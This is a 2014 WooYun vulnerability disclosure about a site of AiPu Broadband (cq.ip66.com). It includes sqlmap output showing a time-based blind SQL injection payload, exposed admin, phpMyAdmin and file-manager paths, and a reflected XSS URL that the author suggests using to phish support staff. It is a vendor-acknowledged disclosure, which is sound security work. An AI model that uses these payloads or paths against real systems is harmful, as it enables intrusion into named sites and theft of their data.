当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055364

漏洞标题:艾普宽带某站若干问题打包(sql注入等)

相关厂商:艾普宽带

漏洞作者: Mr .LZH

提交时间:2014-04-03 11:22

修复时间:2014-05-18 11:22

公开时间:2014-05-18 11:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-03: 细节已通知厂商并且等待厂商处理中
2014-04-03: 厂商已经确认,细节仅向厂商公开
2014-04-13: 细节向核心白帽子及相关领域专家公开
2014-04-23: 细节向普通白帽子公开
2014-05-03: 细节向实习白帽子公开
2014-05-18: 细节向公众公开

简要描述:

艾普宽带某站若干问题打包

详细说明:

漏洞一:
漏洞页面:

QQ截图20140403012035.png


注入点:cq.ip66.com/online.php
post参数:content=1&email=sample%40qq.com&is_submit=1&tel=555-666-0606&username=test

sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Place: POST
Parameter: content
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: content=1' AND SLEEP(5) AND 'sWvn'='sWvn&email=sample@qq.com&is_submit=1&tel=555-666-0606&username=test
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: content
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: content=1' AND SLEEP(5) AND 'sWvn'='sWvn&email=sample@qq.com&is_submit=1&tel=555-666-0606&username=test
---
available databases [1]:
[*] aipu


由于是插入注入,怕严重影响到后台运作,在此停止
后台地址:http://cq.ip66.com/m/manager/login.php
进入易如反掌
漏洞二:文件夹遍历
cq.ip66.com/ckfinder/
cq.ip66.com/files.upload/
cq.ip66.com/m/_/
低危问题:
phpmyadmin地址:cq.ip66.com/phpmyadmin/
有可能被进一步利用
http://cq.ip66.com/m/ckeditor/ckfinder/ckfinder.html
编辑器功能,可上传,删除。。。。。
反射型xxs也有,利用意见反馈钓客服,由于现在已经晚上快2点,不接着玩了。
cq.ip66.com/m/_/mod/xtree/index.php?url=';alert('xxs');a='
无视谷歌浏览器拦截哦。

漏洞证明:

sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Place: POST
Parameter: content
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: content=1' AND SLEEP(5) AND 'sWvn'='sWvn&email=sample@qq.com&is_submit=1&tel=555-666-0606&username=test
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: content
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: content=1' AND SLEEP(5) AND 'sWvn'='sWvn&email=sample@qq.com&is_submit=1&tel=555-666-0606&username=test
---
available databases [1]:
[*] aipu

修复方案:

网络公司,自己懂的
漏洞叠加,rank高点咯

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-04-03 12:38

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-04-03 12:40 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @艾普宽带 被走了小厂商,只得了2rank,好无奈啊,熬夜到2点就注定要只能得到2rank